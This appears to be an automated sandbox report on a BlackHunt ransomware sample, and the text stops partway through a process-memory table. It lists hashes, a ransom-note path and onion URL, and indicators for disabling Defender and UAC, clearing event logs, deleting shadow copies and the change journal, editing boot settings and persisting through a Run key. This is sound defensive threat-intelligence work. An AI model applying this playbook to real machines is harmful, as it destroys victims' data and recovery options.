Analysis
-
max time kernel
144s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 00:34
Static task
static1
Behavioral task
behavioral1
Sample
b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe
Resource
win10v2004-20231222-en
General
-
Target
b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe
-
Size
707KB
-
MD5
5b95914a28d45008c52fc29aec744936
-
SHA1
fa96e2724c1a2c59f1f841de74f3c8c882951494
-
SHA256
b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd
-
SHA512
cde0158a1c73f74c13f820636622c3f4f51ed79160ccd0876bd4dd52c01da15cc783b6208d6cf9f0326009fb4cba0dbee2e928f5a01cdcb23df5eb18adf9baf1
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1f8dvnh:6uaTmkZJ+naie5OTamgEoKxLWWph
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 7048 fsutil.exe 6352 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 11040 wevtutil.exe 3680 wevtutil.exe 10460 wevtutil.exe 10588 wevtutil.exe 14588 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 8284 bcdedit.exe 7204 bcdedit.exe 11184 bcdedit.exe 14428 bcdedit.exe -
Renames multiple (3378) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 6836 wbadmin.exe 14576 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\T: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\R: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\K: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\N: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\O: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\G: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\L: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\V: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Y: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\I: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\J: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\B: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\W: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\U: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\M: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\A: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\H: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\Z: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\E: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\P: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\S: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened (read-only) \??\X: b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-sl\#BlackHunt_ReadMe.hta b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\cs-cz\ui-strings.js b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sl-si\ui-strings.js b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#BlackHunt_Private.key b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\#BlackHunt_Private.key b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\tl.gif b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\#BlackHunt_ReadMe.hta b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\it-it\#BlackHunt_ReadMe.txt b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\he-il\#BlackHunt_Private.key b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nl-nl\ui-strings.js b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files\Java\jdk-1.8\legal\#BlackHunt_ReadMe.hta b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\#BlackHunt_ReadMe.txt b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\#BlackHunt_Private.key b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\#BlackHunt_ReadMe.hta b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-tw\ui-strings.js b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nl-nl\ui-strings.js b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_hover_18.svg b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\#BlackHunt_ReadMe.hta b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\ja-jp\#BlackHunt_ReadMe.hta b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sl-sl\#BlackHunt_ReadMe.hta b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ja-jp\#BlackHunt_ReadMe.txt b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\#BlackHunt_ReadMe.hta b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\#BlackHunt_ReadMe.hta b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\#BlackHunt_ReadMe.txt b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nb-no\#BlackHunt_ReadMe.txt b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pl-pl\#BlackHunt_ReadMe.txt b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\#BlackHunt_Private.key b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\#BlackHunt_Private.key b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\ui-strings.js b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htm b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#BlackHunt_Private.key b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\#BlackHunt_ReadMe.hta b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\#BlackHunt_ReadMe.hta b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\#BlackHunt_Private.key b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\#BlackHunt_ReadMe.hta b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\trash.gif b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-ae\#BlackHunt_Private.key b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\#BlackHunt_ReadMe.txt b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\#BlackHunt_ReadMe.txt b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\#BlackHunt_Private.key b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nl-nl\#BlackHunt_Private.key b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\ui-strings.js b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\it_get.svg b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\#BlackHunt_ReadMe.txt b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files\Java\jre-1.8\lib\applet\#BlackHunt_ReadMe.txt b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#BlackHunt_ReadMe.txt b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\#BlackHunt_ReadMe.hta b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\svgCheckboxSelected.svg b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\#BlackHunt_ReadMe.txt b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\#BlackHunt_ReadMe.hta b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\SearchEmail.png b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\#BlackHunt_ReadMe.txt b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons.png b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\#BlackHunt_ReadMe.txt b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\#BlackHunt_ReadMe.hta b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ar-ae\#BlackHunt_Private.key b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\#BlackHunt_ReadMe.txt b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\#BlackHunt_ReadMe.txt b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\ui-strings.js b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\cs-cz\ui-strings.js b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\theme-2x.png b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\uk-ua\ui-strings.js b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 6276 5912 WerFault.exe 297 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4756 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 864 vssadmin.exe 3096 vssadmin.exe 3204 vssadmin.exe 14248 vssadmin.exe 7016 vssadmin.exe 8424 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 14180 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon Conhost.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" Conhost.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 10516 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe Token: SeRestorePrivilege 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe Token: SeBackupPrivilege 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe Token: SeTakeOwnershipPrivilege 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe Token: SeAuditPrivilege 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe Token: SeSecurityPrivilege 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe Token: SeIncBasePriorityPrivilege 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe Token: SeBackupPrivilege 6800 vssvc.exe Token: SeRestorePrivilege 6800 vssvc.exe Token: SeAuditPrivilege 6800 vssvc.exe Token: SeBackupPrivilege 7520 wbengine.exe Token: SeRestorePrivilege 7520 wbengine.exe Token: SeSecurityPrivilege 7520 wbengine.exe Token: SeSecurityPrivilege 3680 wevtutil.exe Token: SeBackupPrivilege 3680 wevtutil.exe Token: SeSecurityPrivilege 10460 wevtutil.exe Token: SeBackupPrivilege 10460 wevtutil.exe Token: SeSecurityPrivilege 10588 wevtutil.exe Token: SeBackupPrivilege 10588 wevtutil.exe Token: SeSecurityPrivilege 14588 wevtutil.exe Token: SeBackupPrivilege 14588 wevtutil.exe Token: SeSecurityPrivilege 11040 wevtutil.exe Token: SeBackupPrivilege 11040 wevtutil.exe Token: SeDebugPrivilege 14180 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3208 wrote to memory of 3708 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 194 PID 3208 wrote to memory of 3708 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 194 PID 3208 wrote to memory of 4528 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 69 PID 3208 wrote to memory of 4528 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 69 PID 3208 wrote to memory of 4732 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 70 PID 3208 wrote to memory of 4732 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 70 PID 3208 wrote to memory of 1268 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 192 PID 3208 wrote to memory of 1268 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 192 PID 3208 wrote to memory of 5076 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 190 PID 3208 wrote to memory of 5076 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 190 PID 3208 wrote to memory of 3768 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 187 PID 3208 wrote to memory of 3768 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 187 PID 3208 wrote to memory of 4512 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 71 PID 3208 wrote to memory of 4512 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 71 PID 3208 wrote to memory of 1716 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 184 PID 3208 wrote to memory of 1716 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 184 PID 3708 wrote to memory of 2972 3708 cmd.exe 74 PID 3708 wrote to memory of 2972 3708 cmd.exe 74 PID 3208 wrote to memory of 4376 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 72 PID 3208 wrote to memory of 4376 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 72 PID 4528 wrote to memory of 388 4528 cmd.exe 183 PID 4528 wrote to memory of 388 4528 cmd.exe 183 PID 3208 wrote to memory of 2936 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 182 PID 3208 wrote to memory of 2936 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 182 PID 5076 wrote to memory of 3012 5076 cmd.exe 180 PID 5076 wrote to memory of 3012 5076 cmd.exe 180 PID 4732 wrote to memory of 1500 4732 cmd.exe 76 PID 4732 wrote to memory of 1500 4732 cmd.exe 76 PID 3208 wrote to memory of 4764 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 179 PID 3208 wrote to memory of 4764 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 179 PID 3208 wrote to memory of 3588 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 177 PID 3208 wrote to memory of 3588 3208 